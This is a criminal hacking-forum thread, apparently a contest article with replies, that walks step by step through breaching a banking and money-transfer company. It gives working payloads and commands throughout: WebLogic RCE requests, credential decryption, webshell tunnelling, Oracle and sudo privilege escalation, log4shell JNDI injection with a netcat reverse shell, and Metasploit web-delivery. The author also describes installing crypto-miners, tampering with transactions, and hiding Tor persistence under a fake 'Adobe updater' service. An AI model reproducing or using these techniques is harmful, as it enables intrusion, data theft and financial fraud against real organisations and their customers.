Статья Banking, money transfer company hacking, and bypassing Sophos firewall (with hards rules) and the IPS/IDS systems

[spyboy]

Статья отличная, но некоторые утверждения - сомнительны.
В случае, если DNS запросы в операционной системе блокированы брандмауером или используемый dns-резолвер не работает, то ответ всё равно не придёт вне зависимости от операционной системы. То есть, если на виндоус не отвечают днс-запросы, то результата не будет , но это вовсе не значит, что ОС - не виндоус.
Кроме того, программа nslookup кажись имеет немного другой синтаксис:
nslookup domain.com IP-dns-server
Например:
nslookup ya.ru 8.8.8.8
nslookup yandex.com 10.152.152.10

Адрес сервера ДНС можно не указывать. В этом случае будет использоваться системный сервер.

Команда для определения ОС - не совершенна )). Но в данном случае прокатила - повезло ))

You're completely right and I agree with you, in the tutorial I gave a simple example for finding the operating system via nslookup query but there are many ways to identify the operating system one other way using dns is to use the ping for example
For windows
ping -n 1 xxzza.xxxx.dnslog.cn
The first step the ping will do is to send A Dns query to findout the ip address of the dns name and in result for that we will get a result in dnslog.cn portal
And he same thing can be done for linux
ping -c 1 dns_host
Another way if the dns is blocked by the firewall is by implementing a java code inside th3 vulnerability with sleep statement
It will be something like
If(System.getProperty("os.name").contains("linux"){
Thread.sleep(10000);
}
So if the operating system is linux, the response will be delayed 10 seconds and the same thing for windows
The above code maybe contains some errors cause I'm writing the answer from my phone

Anyway, the way that I used in the tutorial was the easiest way

 

[bAlAb0lkA]

Ты же в своей статье описываешь обход фаерволла Софос. Я не знаком с данным фаерволом. Но тебе просто повезло, что админ, который настраивал фаерволл кроме 443 порта оставил открытыми порты 53, 1024:65535, и еще протокол icmp разрешил )) А ещё и RDP ))

 

[spyboy]

Ты же в своей статье описываешь обход фаерволла Софос. Я не знаком с данным фаерволом. Но тебе просто повезло, что админ, который настраивал фаерволл кроме 443 порта оставил открытыми порты 53, 1024:65535, и еще протокол icmp разрешил )) А ещё и RDP ))

Maybe you misunderstood, only dns 53 was allowed nothing except dns. And allowing dns is necessary becaused it is linked to a domain, so it's necessary to identify the ip of the host. I wasn't lucky at all, it was an extremely hard rules blocks EVERYTHIN, I created my own tunnels from zero

 

[Sp1d3rs]

Excellent Work.

 

[bratva]

Клоунов? Почему?

Статья отличная, ушел изучать, Яша спасибо за труд!

Ты что не видел того легендарного видео, где НСД сидел как будто бы запуганный с ментовской мордой ВораВЗаконе и заикающимся голосом объяснял систему флуда через скайп, которую они прикрутили к Gozi и предлагали в аренду? И оба пытались доказать Мазе, какие они, мать его, успешные киберпреступники?

Прошу прощения за оффтоп.

 

[Aster]

You're completely right and I agree with you, in the tutorial I gave a simple example for finding the operating system via nslookup query but there are many ways to identify the operating system one other way using dns is to use the ping for example
For windows
ping -n 1 xxzza.xxxx.dnslog.cn
The first step the ping will do is to send A Dns query to findout the ip address of the dns name and in result for that we will get a result in dnslog.cn portal
And he same thing can be done for linux
ping -c 1 dns_host
Another way if the dns is blocked by the firewall is by implementing a java code inside th3 vulnerability with sleep statement
It will be something like
If(System.getProperty("os.name").contains("linux"){
Thread.sleep(10000);
}
So if the operating system is linux, the response will be delayed 10 seconds and the same thing for windows
The above code maybe contains some errors cause I'm writing the answer from my phone

Anyway, the way that I used in the tutorial was the easiest way

+

 

[Aster]

Hello guys,
This is my first post in the forum and in the contest, so I wanted to make it something good.

Sorry I am writing this article in English but If you have any question or anything unclear don't hesitate to ask me and I will make clear for you

Abstract

In this article I am going to show you how you can bypass Sophos firewall that blocks everything (TCP, UDP, ICMP) and has an advanced IPs and IDs systems that detect any kind of malware. Moreover, I will show you how you can go deep into the network and get a stable connection with the servers and hosts inside the network, and expose more networks and get a reverse shell. All in all, you will learn how you can prepare your hacking stations inside the targets network and how you can from no privileges at all gain a full access to EVERYTHING (Oracle dbs, vcenter, DC admin) and how you can persistence your existence in the network for long time.

Introduction

I always try to filter out the results that come from my bots scans and divide them into two categories, one of them to install crypto-currency miner and the other one for more investigation based on the domains or sub-domains that exist in TLS certs and the existence of "middle proxy, firewall, IDS, IPS ..etc" then when I have free time I start looking for a big fish from the category two to hunt down. The target that I going to use it to explain the techniques is a money transfer, banking company which got my attention because I had difficulties in every step I took and that’s what made me think it would be something good to share with you this experiment.

When I can came to check which vulnerability that effects this company it turned out that one of its servers are effected to weblogic unauthencated RCE CVE-2020-14882, which gives us the ability to execute a java code in the memory of the java process inside the server.

To make sure that we are able to execute java code I had to execute a code that sends a dns query to my domain, and listening by tcpdump for what comes.

Sudo tcpdump –I eth0 udp port 53

Посмотреть вложение 37106
Посмотреть вложение 37107
Good we got the desired query which means that our java code got executed successfully.

Note: You can identify whether the server is windows or not by sending the following command

cmd.exe /c nslookup xxxxx.domain.com

if we get results, it means it's windows, if not it's linux

you can use dnslog.cn for this task and we will use it later in this tutorial.

Now let's supposed that I don't know whether the server has a middleware (firewall, proxy or load balancer) in front of it or not, there is a simple technique that I always use for such things. Simply if there is a firewall I will not be able to get a reverse shell whether (TCP, HTTP, HTTPS) but when it's a proxy or load balancer there is a chance that I can get a reverse http connection , Simple Right ?

So I tried reverse tcp, http and https beacon but without result. I tried common ports like (80,8080,443,8443) that may be they are allowed but without any result L.Moreover, I tried to ping the server to check if there is a possibility to get ping back but without any result too and that was the first problem that I faced (NO REVERSE CONNECTION AT ALL). Which means it's a firewall with rules that block all kind of reverse connections (TCP, UDP, ICMP), so what left for us ?? Yes DNS J reverse connection over DNS.

So I created a DNS beacon connects back to my server and made the payload powershell command, then execute it but without any result L

At that time I knew that I am facing an IPS, IDS system. For those who don't know what an IPs ("Intrusion Prevention System"), IDs (Intrusion Detection System) are ? in simple words they are an antivirus that installed in the firewall to prevent any kind of malware attacks besides the main firewall functionalities and I am going to show how I figured out that we are dealing with Sophos later. That is really bad, we are going to have a lot of work to do.

Let's get started

Since the firewall blocks everything from going out, there is a great possibility that the servers behind it are NOT UP TO DATE which means there are many bugs unfixed and their antiviruses are NOT UP TO DATE as well because the firewall blocks them as well from reaching the updates, which means if we could bypass the IPs, IDs systems and upload our DNS backdoor, we will not need to encrypt it.

I spent some time thinking and trying to upload a file's bytes in chunks using inline technique but the problem that I am facing right now is that this vulnerability launches more than one process when it gets executed which means if I execute

echo|set /p="">beacon.hex
echo|set /p="4d5a900003000000040000000001000000040000000000000cfd775b0da70d420f863a3cd8524d475f8052f0e47533">>beacon.hex --> will be executed and copied more than one time to the beacon.hex which means the file will be corrupted

Fortunately , our exploit is RCE which means we can create our own code to write the file without any errors. I used the java.io.RandomAccessFile class to do so

static void acf(String x,int dbyte) throws IOException{
        long cp = 0;
        java.io.RandomAccessFile acf = new java.io.RandomAccessFile(x,"r");
        while(acf.length() !=cp){
            byte[] temp;
            int sz = (int) (acf.length()-cp);
            if ((sz) >=dbyte)
                temp = new byte[dbyte];
            else
                temp = new byte[sz];
            acf.seek(cp);
            acf.read(temp,0,temp.length);
            cp = acf.getFilePointer();
            //System.out.println(bs64(new String(temp))+" --> "+cp);
            try {
                String s = bs64(new String(temp))+" --> "+cp+"\n";
                java.nio.file.Files.write(Paths.get("C:\\outfile.txt"), s.getBytes(), StandardOpenOption.APPEND);
            }catch (IOException e) {
                //exception handling left as an exercise for the reader
                System.out.println("Error "+e.toString());
            }
        }
     
    }

Acf method will read our backdoor and encode it then output the encoded bytes as lines into C:\outfile.txt, now I will edit the exploit to read the lines and add them into a remote file in the vulnerable system by writing the files in the same place using seek() method. for test purpose I have made a method to be implemented locally in my machine with the previous method

static void wacf(String p, long pos, String d) throws IOException{
        java.io.RandomAccessFile wf = new java.io.RandomAccessFile(p,"rw"); // the path must be bs64 encoded
        wf.seek(pos);
        wf.write(new String(java.util.Base64.getDecoder().decode(d)).getBytes());
         
    }

This is the original exploit
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('"+cmd+"');\");"

We will add wacf() method's code to the exploit and we must focus on the quotes

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.io.RandomAccessFile wf = new java.io.RandomAccessFile(new String(java.util.Base64.getDecoder().decode(\"name_of_file_in_base64String\")),\"rw\");wf.seek(0);wf.write(new String(java.util.Base64.getDecoder().decode(\"base64_line_here\")).getBytes());java.lang.Runtime.getRuntime().exec('nslookup wrote.pop457.dnslog.cn')\");"

Put in seek method the number of the position of the file where to write for example if fist line after decoding the base64 was 100 byte the seek value of the next request will be seek(100) and so on

Replace base64_line_here with the line that found in C:\outfile.txt which acf() method created

Replace wrote.pop457.dnslog.cn with your dns name for reporting

I launched the exploit and uploaded the lines manually and monitored the responses from the server and things went well and the file uploaded. Of course, I used dns beacon to get cc in the cobaltstrike which means domain name has been used , if you don't have one you can create free one from freenom.com.

Sophos IPs, IDs Firewall Bypassing

Let's now launch our DNS beacon

exploit.py [URL]https://target.com[/URL] "cmd.exe /c start orcl_domain.exe"

Посмотреть вложение 37108

As you can see in the figure above we could bypass the firewall and get a reverse dns beacon but with a low level user privileges and the connection is so unstable maybe it's because the IPS prevents some Cobaltstrike's packets ,so we cannot make any tunneling over DNS. Now we have to think of an alternative way to tunnel our connections to the servers.

Since we are in jsp environment we can implement something a way better than DNS tunneling, which is tunneling over http by using the amazing tool A Black Path Towards the Sun (ABPTTS), You can get the tool from the main repo in github -> https://github.com/nccgroup/ABPTTS

To Implement such tunneling we will need to deploy the ABPTTS webshell in the server and to do so we will need to get the password of the weblogic console, so we will need to decrypt the passwords that are exist in the boot.properties file, and to do so we will need to an interactive shell to help us execute the commands in the wlst shell. As a temporary solution we can use dnscat2 yes it's slow but we will only need it to crack the passwords that exists in the weblogic server.
You can download it from the following URL

https://downloads.skullsecurity.org/dnscat2/

I downloaded dnscat2-v0.07-server.zip for the server to listen for the traffic and dnscat2-v0.07-client-win32.zip for windows

Note : the password to unzip the files are "password"

Now let's upload the client to the server as dc.exe and then execute the following command

Exploit.py [URL]https://target.com[/URL] "cmd.exe /c dc --dns domain=domain_here,type=TXT"

and here are some figures for the connection
Посмотреть вложение 37109
Посмотреть вложение 37110
Посмотреть вложение 37111

To interact with a window we type in

Window -i WINDOW_ID_HERE

To exit from windows we press ctrl+z

To get an interactive shell we type shell after that it will open a new window for us, we interact with it by window -i window_id_here

Please note that the connection is not stable so you will need to launch the client more that one time but this is our best choice for now.

Now we will extract the login credentials for the console by executing

> Type servers\AdminServer\security\boot.properties

These are the login credentials before decryption

# Generated by Configuration Wizard on Thu Apr 29 22:33:24 AST 2021
username={AES}Re4nDw1n7PjHF+7bd3pqqLf/mxV0BpzOWn1AyHQ1ovo=
password={AES}DSkOz1wN1OewOiqRN+KWFe1YCttgm105glJCmXdCd3o=

now by executing the following commands I could extract the username and the password for the login console

> cd C:\Oracle\Middleware\Oracle_Home\wlserver\common\bin
> wlst.bat
> domain = "C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain"
> service = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domain)
> encryption = weblogic.security.internal.encryption.ClearOrEncryptedService(service)
> encryption.decrypt("{AES}Re4nDw1n7PjHF+7bd3pqqLf/mxV0BpzOWn1AyHQ1ovo=")
'wallet'
> encryption.decrypt("{AES}Re4nDw1n7PjHF+7bd3pqqLf/mxV0BpzOWn1AyHQ1ovo=")
' walletAdmin1'

Domain : the path for the weblogic domain

Service: creating an encryption service and store it into the variable service

Encryption: get an AES decryption object and store it in encryption variable

Encryption.decrypt() --> call the decryption function and pass the AES value

Before logging in and closing the dnscat2 tunnel we need to crack the databases passwords and the passwords of the databases are exist in files called datasources, these files are exist under the path

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain1\config\jdbc

I found some xml files that contain login credentials to the databases servers and this is one of them

<?xml version='1.0' encoding='UTF-8'?>
<jdbc-data-source xmlns="http://xmlns.oracle.com/weblogic/jdbc-data-source" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/jdbc-data-source http://xmlns.oracle.com/weblogic/jdbc-data-source/1.0/jdbc-data-source.xsd">
  <name>JDBC GridLink Data Source-0</name>
  <datasource-type>AGL</datasource-type>
  <jdbc-driver-params>
    <url>jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=172.16.33.33)(PORT=1533)))(CONNECT_DATA=(SERVICE_NAME=walletDB)))</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>wallet</value>
      </property>
    </properties>
    <password-encrypted>{AES}3kvyGZTpFd5gIxzRAGIjDNmbKTIhLhAARvhYv+ld63w=</password-encrypted>
  </jdbc-driver-params>
  <jdbc-connection-pool-params>
    <initial-capacity>100</initial-capacity>
    <max-capacity>3500</max-capacity>
    <min-capacity>1</min-capacity>
    <shrink-frequency-seconds>900</shrink-frequency-seconds>
    <highest-num-waiters>2147483647</highest-num-waiters>
    <connection-creation-retry-frequency-seconds>0</connection-creation-retry-frequency-seconds>
    <connection-reserve-timeout-seconds>10</connection-reserve-timeout-seconds>
    <test-frequency-seconds>120</test-frequency-seconds>
    <test-connections-on-reserve>false</test-connections-on-reserve>
    <ignore-in-use-connections-enabled>true</ignore-in-use-connections-enabled>
    <inactive-connection-timeout-seconds>120</inactive-connection-timeout-seconds>
    <test-table-name>SQL ISVALID</test-table-name>
    <login-delay-seconds>0</login-delay-seconds>
    <statement-cache-size>100</statement-cache-size>
    <statement-cache-type>LRU</statement-cache-type>
    <remove-infected-connections>true</remove-infected-connections>
    <seconds-to-trust-an-idle-pool-connection>10</seconds-to-trust-an-idle-pool-connection>
    <statement-timeout>-1</statement-timeout>
    <pinned-to-thread>false</pinned-to-thread>
    <wrap-types>true</wrap-types>
    <connection-harvest-max-count>1</connection-harvest-max-count>
    <connection-harvest-trigger-count>-1</connection-harvest-trigger-count>
    <count-of-test-failures-till-flush>2</count-of-test-failures-till-flush>
    <count-of-refresh-failures-till-disable>2</count-of-refresh-failures-till-disable>
  </jdbc-connection-pool-params>
  <jdbc-data-source-params>
    <jndi-name>jdbc/restDS</jndi-name>
    <global-transactions-protocol>OnePhaseCommit</global-transactions-protocol>
  </jdbc-data-source-params>
  <jdbc-oracle-params>
    <fan-enabled>false</fan-enabled>
    <ons-node-list></ons-node-list>
    <ons-wallet-file></ons-wallet-file>
    <active-gridlink>true</active-gridlink>
  </jdbc-oracle-params>
</jdbc-data-source>

Between the password-encrypted tag we can find the aes encrypted password that used to connect to the database in the remote server "172.16.33.33"

Dbname = walletDB
Dbuser= wallet
Host=172.16.33.33
Encrypted password= {AES}3kvyGZTpFd5gIxzRAGIjDNmbKTIhLhAARvhYv+ld63w=

Now let's execute the same decrypting command in the wlst shell

> encryption.decrypt("{AES}3kvyGZTpFd5gIxzRAGIjDNmbKTIhLhAARvhYv+ld63w=")
'wallet_123'

Now we have all the login credentials for both database server of wallet application and the weblogic console login. Now let's try to login

Посмотреть вложение 37112

Finally we logged in , that was hard and exhausted.
Now it's time for the great tool " a black path toward the sun"
Something to mention about this tool is, it supports tunneling over http for both aspx and jsp.
Now Implement the following commands in the terminal

git clone https://github.com/nccgroup/ABPTTS.git
cd ABPTTS
python abpttsfactory.py -o webshell

now we have webshells (aspx, jsp and war) in the webshell folder, we are interested right now in the war shell because weblogic only deploys war files as web app

ls -lah webshell
Посмотреть вложение 37113
We will upload the philanderersRedeemer.war via the weblogic console

Deploying an application in weblogic is pretty simple just follow these steps:

• Click on Lock & Edit
• Click on Deployments
• Click on install
• Click on Upload your file(s)
• Browse for the webshell and select it then ignore anything else and click next
• Click next
• Next again
• Remember the name that comes in the name field
• Finish

under Summary of Deployments click the control tab, then down beneath the Deployments select your file then click start-> servicing all requests, finally click Release Configuration

That's it
Now my abpts shell url is https://target.com/abpts/philanderersRedeemer.jsp

Now we have the ability to tunnel over http which is much faster than DNS which means we have bypassed the firewall and the IPS, IPs.
Tunnel over HTTP

ABPTTS provides an easy way to tunnel the connections with a simple command line

python abpttsclient.py -c [Config file] -u [abptts webshell]-f local_IP_to_Listen:[Local_port]/[Remote_IP_to_connect]:[Remote_Port]

Now we will use the database login creds to hack the oracle server NOT only the database and gain root privileges on the server then connect to databases inside the server and do whatever we want like change the transactions number, reuse an old transfer money by editing it from the tables and anything that comes to our minds.

So how will we have oracle server by using the oracle database login creds ? we will use a tool called Oracle Database Attacking Tool, this tool is an amazing tool , it checks all the available exploits and privileges for the database user and gives us the report.

So first let's tunnel over http by using the following command

python abpttsclient.py -c webshell/config.txt -u https://target.com/abpts/philanderersRedeemer.jsp -f 127.0.0.1:1521/172.16.33.33:1533 -v

127.0.0.1:1521 --> loopback interface and local port to listen on our attacking machine

172.16.33.33:1533 --> remote ip of the oracle server and remote listening port

Easy right !!!

If we check for the listening connections now in our machine we will notice that python is now listening on port 127.0.0.1:1521

Netstat –nltp
Посмотреть вложение 37115
Break into Database server

To hack an oracle database server, we will need to check the privileges that the db user has and use them for our favor. To do this we will user Oracle Database Attacking Tool ODAT, this amazing tool will do all the hard work for us J.

This tool does many attacks against oracle server and give a nice and sorted result, you can download it from the following URL

https://github.com/quentinhardy/odat/releases/download/5.1.1/odat-linux-libc2.17-x86_64.tar.gz

Now let's launch the attack against 172.16.33.33 server which we have its database credentials.

execute the following command:

odat all -s 127.0.0.1 -U wallet -P wallet_123 -d walletDB

all --> testing for everything

127.0.0.1 --> our listening loopback interface

-U for the user name

-P for the password

-d for the database



Посмотреть вложение 37116

The OK means we can use the lib for exploiting. For me, UTL_FILE library always works fine especially when the oracle server is linux, to check if it's linux we need to tunnel for ssh and try to login

python abpttsclient.py -c webshell/config.txt -u https://target.com/abpts/philanderersRedeemer.jsp -f 127.0.0.1:1521/172.16.33.33:1533 -f 127.0.0.1:2222/172.16.33.33:22 -v
ssh 127.0.0.1 –p 2222

Посмотреть вложение 37117
Linux lol

The utlfile lib is capable of doing almost everything to files in the server such as upload file from our machine to the server or download a file from the server to our machine and of course delete file, to see the lib's functionalities just time odat utlfile –h.

Now let's upload an ssh key to the oracle server to the path /home/oracle/.ssh/authorized_keys and connect to it. If you haven't created an ssh key before, you can do it using the tool ssh-keygen which by default in linux.

Anyway I have one in home directory of the kali linux, so I will upload it to the oracle server, please see the following figure.
Посмотреть вложение 37118
So now our ssh key is on the /home/oracle/.ssh folder as authorized_keys which means we can connect to the oracle server without providing the password by executing the following command
Ssh [EMAIL]oracle@127.0.0.1[/EMAIL] –p 2222

Посмотреть вложение 37119
Bingo we are inside the oracle server

Now our connection with the oracle server looks like this
Посмотреть вложение 37120

Now what's next ?

Privilege escalation

For the past two years, linux has been suffering from privilege escalation vulnerabilities such as CVE-2021-3156,pwnkit, dirtypipe and Nimbuspwn. I will try to check for the first one by using this perl line sudoedit -s '\' `perl -e 'print "A" x 65536'`
Посмотреть вложение 37121
It'is vulnerable, the exploit is available on github -> https://github.com/worawit/CVE-2021-3156

let's upload the exploit using scp command
scp -P2222 -i ~/.ssh/id_rsa CVE-2021-3156.zip [EMAIL]oracle@127.0.0.1:/tmp[/EMAIL]
Посмотреть вложение 37122

unzip CVE-2021-3156.zip

cd CVE-2021-3156-main/

python exploit_defaults_mailer.py

Посмотреть вложение 37123

Let's run /tmp/sshell
Посмотреть вложение 37124


Now we have root in a linux system which means we can use this system as our hacking station inside the network and execute any kind of attacks from it or scan the network.
But now I will create a user with root privileges in the server to make things better for us.
Execute the following commands

useradd --no-create-home sql
usermod –aG sudo sql
passwd sql  then set the password for the user sql

Now we can browse all the databases that exist in this server without any limitation, so let's connect to the oracle database

sqlplus / as sysdba
SELECT NAME FROM v$database;
select table_name from all_tables where owner='WALLET'; // we will get the tables for user wallet

Посмотреть вложение 37125
Now we can use the insert or update statements for manipulating the clients transactions. However, we will first need to study and analyze the database tables and columns to understand what columns or tables to edit and this will take some time, so I will stop here and more to the next section.

Going deep into network
We need to move from this machine to others so we can reach the domain controller because we landed on a machine with low user privileges and outside company's MS domain. I always when I get a foothold on the network the first thing for me is to look for the vcenter and it's often connected to almost every interface in the network or has access to every network range, so it's a good place to start with, which will help us a lot in discovering the network without any filters. We will use masscan tool to scan the range 192.168.0.0/16 for port 443 which ESXi, vCenter and many other hypervisors are listening on.
So we transfer masscan to the oracle server from our machine but we will use rsync command with big files in case the network gets interrupted, so we can complete the transfer from where we stopped.

rsync –P –e "ssh –p 2222" masscan sql@127.0.0.1:/tmp

this command will transfer the masscan to the tmp file in the oracle server .
now let's start scanning

cd /tmp
chmod +x masscan
./masscan –p 443 192.168.0.0/16 –rate=10000 >> 443.txt

--rate = number of packets per second, it's not recommended to increase it more than 100000 because you would be disconnected from the host and the result of the scan will not be accurate, maybe you would miss some hosts.
Now we have the results stored in 443.txt file we want now to check if these ips contains ESXi, vcenter. I made a simple python script to do so, I will attach it with the files by the end of the article.
Посмотреть вложение 37126
192.168.0.81 is vcenter , We found it.
Let's check if the vcenter is vulnerable to log4shell vulnerability, I made python script to do so, it will be in the attachments as well. We will transfer it to the oracle server the same way we did with masscan.

psync –P –e "ssh –p 2222" vcenter.py sql@127.0.0.1:/tmp

Посмотреть вложение 37127

the result is :

Посмотреть вложение 37128
And it's vulnerable


Break into VCenter

Now to exploit the vcenter we will need to transfer rogue-jndi, you can get it in the github

In our kali linux we will execute the following command to get it.

git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package

maybe you will need to install mvn (maven) in case it's not installed in your kali machine, then we will zip the target folder

zip target.zip –r target

then transfer it to the oracle server

rsync –P –e "ssh –p 2222" target.zip sql@127.0.0.1:/tmp

The exploitation idea is to get a reverse connection from vcenter to our cloud server or to the oracle server.

The exploitation steps are:

• Provide the rogue-jndi with the command to get executed in the vcenter, ldap listening port and http port, you can use the default ports
• Execute the python exploit which we have already transferred it to the oracle server

You can read more about the exploit here

https://www.sprocketsecurity.com/blog/how-to-exploit-log4j-vulnerabilities-in-vmware-vcenter

be default vcenter comes with netcat, so we can use it to get a reverse shell either to our cloud server or to oracle server.

I tried to get a reverse shell to my cloud server but it failed, so I got reverse shell to the oracle server.

Run the exploit, then change the value inside the vcenter.py script

java -jar target/RogueJndi-1.1.jar -c "nc 172.16.33.33 443 -e /bin/bash"

nano vcenter.py

Посмотреть вложение 37129

Save and run the exploit

python vcenter.py [URL='https://192.168.0.81']https://192.168.0.81[/URL]

Посмотреть вложение 37130
We got reverse shell, so let's execute

id
/bin/bash –I

Now it's time for me to show you that we have been dealing with Sophos firewall from the beginning, I tried to send a get request to xss.pro from the vcenter host, and that is the response
Посмотреть вложение 37131
Now our connection to the vcenter looks like this
Посмотреть вложение 37132


Deeper and deeper

As I mentioned earlier, often vCenter host has access to almost all ranges in the network because many running servers are virtual and in many cases they need to link them to the vcenter to manage them, so we will try to scan class A network which is 10.0.0.0/8 from the vcenter by using masscan, but first we need to create a user with root privileges like we did in the oracle server.

useradd --no-create-home sql –shell /bin/bash

usermod –aG sudo sql

passwd sql à then set the password for the user sql

now we will make a tunnel directly from 192.168.0.28 --> 192.168.0.81

python abpttsclient.py -c webshell/config.txt -u https://target.com/abpts/philanderersRedeemer.jsp -f 127.0.0.1:1521/172.16.33.33:1533 -f 127.0.0.1:2222/172.16.33.33:22 -f 127.0.0.1:3333/192.168.0.81:22 -v

Посмотреть вложение 37133

So let's login via ssh

Посмотреть вложение 37134

Now let's scan the class A private IP and in case we don't get something good we will scan class B and class C, I will focus on the services like http,https services on the following ports

443,8443,80,8080,8081,8082,8083,7001,7002,9001,9002

After we look for such ports, we will use zgrab2 to look for backend jsp servers like tomcat, jboss,weblogic, Jenkins or any server that contains in its response JSESSIONID so we can try to exploit them using log4shell exploit like we did with vcenter.
Before we begin I want to mention something very important about the combination between masscan and zgrab2. These two tools are extremely fast, which means their results are not accurate, one more thing about zgrab2, this tool does not authenticate tls ssl certificate all the time, I tried to find what's the problem but with no chance, so if any of you guys have any idea that would be nice if you post the solution in the comments J. Anyway, zgrab2 still strong and effective.

Now let's get root

Sudo /bin/bash

Then type the password

And in another terminal let's transfer the masscan

rsync –P –e "ssh –p 3333" masscan sql@127.0.0.1:/tmp
In ssh terminal
cd /tmp
mkdir .xx
mv masscan .xx
cd .xx
chmod +x masscan
./masscan –p 443 10.0.0.0/8 –rate=100000 >> 443.txt

Посмотреть вложение 37135
We filtered the output using the command

cat 443.txt | cut –d ' ' –f6 >> 443_filtered.txt

Now we will use zgrab2 to send get requests on port 443
Посмотреть вложение 37136
Now it's time to filter out the outputs that produced by zgrab2, since we have 169 hosts it will be very hard to sort and filter the output and look for the services and scripts, so I create a simple shell script to do the job for us, it will be in the attachments.

Let's transfer it to the server

rsync –P –e "ssh –p 3333" detect.sh.zip sql@127.0.0.1:/tmp

And in the ssh terminal

mv ../detect.sh.zip .
unzip detect.sh.zip
chmod +x detect.sh
./detect.sh 443.cvs #443.csv is the zgrab2 result
ls -lah out/

and the results are :
Посмотреть вложение 37137
As you can see we have results in JSESSIONID txt file, tomcat.txt, vmware horizon and wordpress. We all know that vmware horizon is vulnerable to log4shell and I am sure that we would find more on the tomcat and many more in jsessionid and we have not scanned the other ports, we only scanned 443 port.

Посмотреть вложение 37138

Let's check if these hosts are vulnerable to log4shell.
Exploit is:
curl -vv -H "Accept-Language: \${jndi:ldap://DNSHOST}" --insecure https://target_ip/portal/info.jsp
Посмотреть вложение 37139
Both of them are vulnerables

Very well now let's exploit one of them the same way we did with vcenter, but we have to try to get a reverse shell to our cloud first.

This time when I tried to get a reverse shell to the cloud, it worked
So let's create a meterpreter payload

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lport 8444
lport => 8444
msf6 exploit(multi/script/web_delivery) > set lhost eth0
lhost => eth0
msf6 exploit(multi/script/web_delivery) > run

and run the rogue-jndi exploit
java –jar target/RogueJndi-1.1.jar –l 8443 –p 8081 –c "powershell payload"

then from other terminal run the exploit

curl -vv -H "Accept-Language: \${jndi:ldap://serverip:8443/o=tomcat}" --insecure https:// 10.90.11.100/portal/info.jsp

Посмотреть вложение 37142

Successfully bypassed the firewall and get reverse shell to my cloud.

Our connection now is like this:
Посмотреть вложение 37144

And what's amazing is, now we are inside the network domain
Посмотреть вложение 37145
Network domain owning

Once we are on the domain, it's very easy to get domain admin especially with vulnerabilities like petitpotam,nightmare,remotepotato0,zerologon,misconfig..etc.

But the easiest way and worked for me this time is by migrating our payload's process with a process owned by domain admin

So we will ask for the domain admins by executing the command

net group "domain admins" /domain

then look for the running processes in the current server and view only the process that are owned by the domain

tasklist /v|findstr /I "domain name here"

Посмотреть вложение 37146
As you can see on the figure, all the output processes are running by user called "mabutaha" and this user has admin rights, so I will migrate our session with the process with pid 3660, then we will ask for the domain controllers (DCs) by executing the following command

nltest /dclist:domain_name_here

after that we will check if we have the ability to list the C drive in one of the DCs. If so, it means we are domain admin and we can access all the hosts and servers that is connected to the domain.
Посмотреть вложение 37147

We are domain admin loool . That was pretty easy and quick. Actually, any company relays on their firewall for security and does not care about what's behind, they have no security at all because as you have seen in the end we could bypass the firewall and the IPS and IDS and we end-up a domain admin and have the ability to control the entire company.

"What I have found from my experience that the company's with firewall rules like this one, their network engineers are big fools and we I see such filter that attracts me to the company because I know that what's behind is not secure at all, yes it's not all the time but this thing is strongly common and I had such scenario with multibillion-dollar shareholding US Bank, when I bypass the firewall, almost all the operating systems where weak and vulnerable."

So now we have everything. If you have noticed from the figure that shows the domain admins, there is a veeam backup user, which means that we can extract the passwords for the esxi servers from the backup servers sooooo easy, and I have seen a tutorial here in the previous contest talking about such thing and explaining the way to do so.

Persistence

One of the most important things to do after you own the company is to create a legal backdoor to reach the servers without triggering an alarm by an antivirus or any security product, and this can be done in many ways like making a tunnel by ngrok or tor or by installing anydesk or by creating your own backdoor and link it to a server over ICMP or tcp or even DNS.

For me and many people, making a tunnel over tor is the best option

So I will make it short and quick because it's very easy to do so.

• Upload tor to the server
• Extract it any place you want
• Change the torrc file config

SocksPort 45120 --> the listening port for tor

HiddenServiceDir C:\ProgramData\MSConnect à path for hidden service

HiddenServicePort 80 127.0.0.1:3389 --> connect through port 80 to the current host's rdp on port 3389

MaxCircuitDirtiness 10 à keep it or change it, it's up to you

Create a service for the tor process with the name you like

sc create "Adobe updater" binpath= "path for tor.exe process –nt-service –f \"path for torrc file\"" start= auto

sc start "Adobe updater"

Get the hostname that tor has created for you

type C:\ProgramData\MSConnect\hostname

Copy the output because you will need it to connect to the server.

Now when you want to connect the server you have to run tor into your kali machine --> set proxychains config to tunnel via tor

Then execute the following command

proxychains rdesktop hostname_here:port

Port in the torrc file is 80

Proxychains rdesktop hostname_here:80

That's it

I spent hours on writing this article, so if you have found something unclear, please don't hesitate to ask me and I will try my best to make it clear to you

Guys I still have two other articles to participate in the contest and I think we still have a plenty of time, so If you want anything to be explained or any ideas for articles, please tell me in the comments


The attachments:
Link 1
Link 2

Thanks for reading

Very good article)

 

[spyboy]

DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach

Volexity frequently works with individuals and organizations heavily targeted by sophisticated, motivated, and well-equipped threat actors from around the world. Some of these individuals or organizations are attacked infrequently or […]

www.volexity.com

They didn't give thanks to you))
Very good article)

I don't understand what you mean by "They didn't give thanks to you"

